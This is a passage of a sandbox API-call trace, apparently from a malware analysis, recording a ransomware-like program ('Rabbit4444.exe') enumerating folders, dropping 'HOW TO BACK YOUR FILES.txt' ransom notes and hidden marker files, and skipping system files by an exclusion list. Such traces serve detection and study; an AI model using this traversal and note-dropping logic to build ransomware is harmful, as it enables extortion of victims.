(lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0061.625] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0061.626] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.626] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.626] CloseHandle (hObject=0x29c) returned 1 [0061.626] CloseHandle (hObject=0x2a0) returned 1 [0061.626] GetCurrentThreadId () returned 0x2d4 [0061.626] RtlInterlockedPopEntrySList (in: ListHead=0x1220c8 | out: ListHead=0x1220c8) returned 0x1221a8 [0061.626] lstrcpynW (in: lpString1=0x11ceb88, lpString2="C:\\Users\\Default\\AppData\\Local", iMaxLength=2048 | out: lpString1="C:\\Users\\Default\\AppData\\Local") returned="C:\\Users\\Default\\AppData\\Local" [0061.626] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x114fb8 | out: hHeap=0xe0000) returned 1 [0061.626] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221a0 | out: hHeap=0xe0000) returned 1 [0061.627] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default\\AppData\\Local" | out: lpString1="C:\\Users\\Default\\AppData\\Local") returned="C:\\Users\\Default\\AppData\\Local" [0061.627] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\") returned="C:\\Users\\Default\\AppData\\Local\\" [0061.627] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Default\\AppData\\Local\\.BFC0E91B00AE8A0620D3" [0061.627] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\default\\appdata\\local\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0061.628] WriteFile (in: hFile=0x2a0, lpBuffer=0x11cdb90*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x11ccb48, lpOverlapped=0x0 | out: lpBuffer=0x11cdb90*, lpNumberOfBytesWritten=0x11ccb48*=0x3d4, lpOverlapped=0x0) returned 1 [0061.630] FlushFileBuffers (hFile=0x2a0) returned 1 [0061.631] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.631] CloseHandle (hObject=0x2a0) returned 1 [0061.632] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local") returned 30 [0061.632] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.632] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\*", lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xee0f635d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102750 [0061.632] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.632] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.632] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.632] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.632] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xee0f635d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.632] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.632] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.632] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.632] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.632] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.632] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee0f635d, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee0f635d, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee0f635d, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0x0, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.632] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.632] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.632] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0061.632] lstrcmpiW (lpString1="Application Data", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.632] lstrcmpiW (lpString1="Application Data", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.632] lstrcmpiW (lpString1="Application Data", lpString2="Rabbit4444.exe") returned -1 [0061.632] lstrcmpiW (lpString1="Application Data", lpString2=".") returned 1 [0061.632] lstrcmpiW (lpString1="Application Data", lpString2="..") returned 1 [0061.632] lstrcmpiW (lpString1="Application Data", lpString2="windows") returned -1 [0061.632] lstrcmpiW (lpString1="Application Data", lpString2="bootmgr") returned -1 [0061.632] lstrcmpiW (lpString1="Application Data", lpString2="pagefile.sys") returned -1 [0061.632] lstrcmpiW (lpString1="Application Data", lpString2="boot") returned -1 [0061.632] lstrcmpiW (lpString1="Application Data", lpString2="ids.txt") returned -1 [0061.633] lstrcmpiW (lpString1="Application Data", lpString2="NTUSER.DAT") returned -1 [0061.633] lstrcpyW (in: lpString1=0x11cebc6, lpString2="Application Data" | out: lpString1="Application Data") returned="Application Data" [0061.633] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Application Data", dwFileAttributes=0x2412) returned 1 [0061.634] wsprintfA (in: param_1=0x11ce388, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\Default\\AppData\\Local\\Application Data\r\n") returned 66 [0061.634] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\Default\\AppData\\Local\\Application Data\r\n") returned 66 [0061.634] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0061.634] SetFilePointer (in: hFile=0x29c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe3e [0061.635] WriteFile (in: hFile=0x29c, lpBuffer=0x11ce388*, nNumberOfBytesToWrite=0x42, lpNumberOfBytesWritten=0x11cdb44, lpOverlapped=0x0 | out: lpBuffer=0x11ce388*, lpNumberOfBytesWritten=0x11cdb44*=0x42, lpOverlapped=0x0) returned 1 [0061.636] CloseHandle (hObject=0x29c) returned 1 [0061.637] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0061.637] lstrcmpiW (lpString1="History", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.637] lstrcmpiW (lpString1="History", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.637] lstrcmpiW (lpString1="History", lpString2="Rabbit4444.exe") returned -1 [0061.637] lstrcmpiW (lpString1="History", lpString2=".") returned 1 [0061.637] lstrcmpiW (lpString1="History", lpString2="..") returned 1 [0061.637] lstrcmpiW (lpString1="History", lpString2="windows") returned -1 [0061.637] lstrcmpiW (lpString1="History", lpString2="bootmgr") returned 1 [0061.637] lstrcmpiW (lpString1="History", lpString2="pagefile.sys") returned -1 [0061.637] lstrcmpiW (lpString1="History", lpString2="boot") returned 1 [0061.637] lstrcmpiW (lpString1="History", lpString2="ids.txt") returned -1 [0061.637] lstrcmpiW (lpString1="History", lpString2="NTUSER.DAT") returned -1 [0061.638] lstrcpyW (in: lpString1=0x11cebc6, lpString2="History" | out: lpString1="History") returned="History" [0061.638] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\History", dwFileAttributes=0x2412) returned 1 [0061.638] wsprintfA (in: param_1=0x11ce388, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\Default\\AppData\\Local\\History\r\n") returned 57 [0061.638] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\Default\\AppData\\Local\\History\r\n") returned 57 [0061.638] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0061.638] SetFilePointer (in: hFile=0x29c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xe80 [0061.638] WriteFile (in: hFile=0x29c, lpBuffer=0x11ce388*, nNumberOfBytesToWrite=0x39, lpNumberOfBytesWritten=0x11cdb44, lpOverlapped=0x0 | out: lpBuffer=0x11ce388*, lpNumberOfBytesWritten=0x11cdb44*=0x39, lpOverlapped=0x0) returned 1 [0061.641] CloseHandle (hObject=0x29c) returned 1 [0061.641] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3af063e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe6dc3522, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0061.641] lstrcmpiW (lpString1="Microsoft", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.641] lstrcmpiW (lpString1="Microsoft", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.641] lstrcmpiW (lpString1="Microsoft", lpString2="Rabbit4444.exe") returned -1 [0061.642] lstrcmpiW (lpString1="Microsoft", lpString2=".") returned 1 [0061.642] lstrcmpiW (lpString1="Microsoft", lpString2="..") returned 1 [0061.642] lstrcmpiW (lpString1="Microsoft", lpString2="windows") returned -1 [0061.642] lstrcmpiW (lpString1="Microsoft", lpString2="bootmgr") returned 1 [0061.642] lstrcmpiW (lpString1="Microsoft", lpString2="pagefile.sys") returned -1 [0061.642] lstrcmpiW (lpString1="Microsoft", lpString2="boot") returned 1 [0061.642] lstrcmpiW (lpString1="Microsoft", lpString2="ids.txt") returned 1 [0061.642] lstrcmpiW (lpString1="Microsoft", lpString2="NTUSER.DAT") returned -1 [0061.642] lstrcpyW (in: lpString1=0x11cebc6, lpString2="Microsoft" | out: lpString1="Microsoft") returned="Microsoft" [0061.642] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1220a0 [0061.642] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x52) returned 0x115b68 [0061.642] RtlInterlockedPushEntrySList (in: ListHead=0x1220c8, ListEntry=0x1220a8 | out: ListHead=0x1220c8, ListEntry=0x1220a8) returned 0x0 [0061.642] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c8b6f3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0061.642] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.642] lstrcmpiW (lpString1="Temp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.642] lstrcmpiW (lpString1="Temp", lpString2="Rabbit4444.exe") returned 1 [0061.642] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0061.642] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0061.642] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0061.642] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0061.642] lstrcmpiW (lpString1="Temp", lpString2="pagefile.sys") returned 1 [0061.642] lstrcmpiW (lpString1="Temp", lpString2="boot") returned 1 [0061.642] lstrcmpiW (lpString1="Temp", lpString2="ids.txt") returned 1 [0061.642] lstrcmpiW (lpString1="Temp", lpString2="NTUSER.DAT") returned 1 [0061.642] lstrcpyW (in: lpString1=0x11cebc6, lpString2="Temp" | out: lpString1="Temp") returned="Temp" [0061.643] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1221e0 [0061.643] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x48) returned 0x10b600 [0061.643] RtlInterlockedPushEntrySList (in: ListHead=0x1220c8, ListEntry=0x1221e8 | out: ListHead=0x1220c8, ListEntry=0x1221e8) returned 0x1220a8 [0061.643] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x78624286, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0061.643] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.643] lstrcmpiW (lpString1="Temporary Internet Files", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.643] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="Rabbit4444.exe") returned 1 [0061.643] lstrcmpiW (lpString1="Temporary Internet Files", lpString2=".") returned 1 [0061.643] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="..") returned 1 [0061.643] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="windows") returned -1 [0061.643] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="bootmgr") returned 1 [0061.643] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="pagefile.sys") returned 1 [0061.643] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="boot") returned 1 [0061.643] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="ids.txt") returned 1 [0061.643] lstrcmpiW (lpString1="Temporary Internet Files", lpString2="NTUSER.DAT") returned 1 [0061.643] lstrcpyW (in: lpString1=0x11cebc6, lpString2="Temporary Internet Files" | out: lpString1="Temporary Internet Files") returned="Temporary Internet Files" [0061.643] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files", dwFileAttributes=0x2412) returned 1 [0061.643] wsprintfA (in: param_1=0x11ce388, param_2="[IGNORE SIMLINK] %S\r\n" | out: param_1="[IGNORE SIMLINK] C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\r\n") returned 74 [0061.643] lstrlenA (lpString="[IGNORE SIMLINK] C:\\Users\\Default\\AppData\\Local\\Temporary Internet Files\r\n") returned 74 [0061.643] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\ids.txt" (normalized: "c:\\users\\fd1hvy\\desktop\\ids.txt"), dwDesiredAccess=0xe0003, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0061.644] SetFilePointer (in: hFile=0x29c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xeb9 [0061.644] WriteFile (in: hFile=0x29c, lpBuffer=0x11ce388*, nNumberOfBytesToWrite=0x4a, lpNumberOfBytesWritten=0x11cdb44, lpOverlapped=0x0 | out: lpBuffer=0x11ce388*, lpNumberOfBytesWritten=0x11cdb44*=0x4a, lpOverlapped=0x0) returned 1 [0061.645] CloseHandle (hObject=0x29c) returned 1 [0061.646] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x78624286, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 0 [0061.646] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0061.646] lstrcpyW (in: lpString1=0x11cebc6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.646] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0061.647] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0061.647] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.647] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.647] CloseHandle (hObject=0x29c) returned 1 [0061.647] CloseHandle (hObject=0x2a0) returned 1 [0061.647] GetCurrentThreadId () returned 0x2d4 [0061.647] RtlInterlockedPopEntrySList (in: ListHead=0x1220c8 | out: ListHead=0x1220c8) returned 0x1221e8 [0061.647] lstrcpynW (in: lpString1=0x11ceb88, lpString2="C:\\Users\\Default\\AppData\\Local\\Temp", iMaxLength=2048 | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Temp") returned="C:\\Users\\Default\\AppData\\Local\\Temp" [0061.647] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10b600 | out: hHeap=0xe0000) returned 1 [0061.647] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1221e0 | out: hHeap=0xe0000) returned 1 [0061.647] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default\\AppData\\Local\\Temp" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Temp") returned="C:\\Users\\Default\\AppData\\Local\\Temp" [0061.648] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Temp\\") returned="C:\\Users\\Default\\AppData\\Local\\Temp\\" [0061.648] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Local\\Temp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Temp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\Default\\AppData\\Local\\Temp\\.BFC0E91B00AE8A0620D3" [0061.648] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Temp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\default\\appdata\\local\\temp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2a0 [0061.649] WriteFile (in: hFile=0x2a0, lpBuffer=0x11cdb90*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x11ccb48, lpOverlapped=0x0 | out: lpBuffer=0x11cdb90*, lpNumberOfBytesWritten=0x11ccb48*=0x3d4, lpOverlapped=0x0) returned 1 [0061.651] FlushFileBuffers (hFile=0x2a0) returned 1 [0061.652] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Temp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.653] CloseHandle (hObject=0x2a0) returned 1 [0061.653] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Local\\Temp") returned 35 [0061.653] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.653] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Temp\\*", lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c8b6f3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee11c5eb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a10 [0061.653] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.653] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.653] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.653] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.653] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3c8b6f3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xee11c5eb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.654] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.654] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.654] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.654] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.654] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.654] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee11c5eb, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee11c5eb, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee11c5eb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.654] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.654] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.654] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x11ce038 | out: lpFindFileData=0x11ce038*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee11c5eb, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee11c5eb, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee11c5eb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.654] FindClose (in: hFindFile=0x102a10 | out: hFindFile=0x102a10) returned 1 [0061.654] lstrcpyW (in: lpString1=0x11cebd0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.654] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Temp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\default\\appdata\\local\\temp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0061.655] CreateFileMappingW (hFile=0x2a0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0061.655] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.655] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.655] CloseHandle (hObject=0x29c) returned 1 [0061.655] CloseHandle (hObject=0x2a0) returned 1 [0061.655] GetCurrentThreadId () returned 0x2d4 [0061.655] RtlInterlockedPopEntrySList (in: ListHead=0x1220c8 | out: ListHead=0x1220c8) returned 0x1220a8 [0061.655] lstrcpynW (in: lpString1=0x11ceb88, lpString2="C:\\Users\\Default\\AppData\\Local\\Microsoft", iMaxLength=2048 | out: lpString1="C:\\Users\\Default\\AppData\\Local\\Microsoft") returned="C:\\Users\\Default\\AppData\\Local\\Microsoft" [0061.655] HeapFree (in: 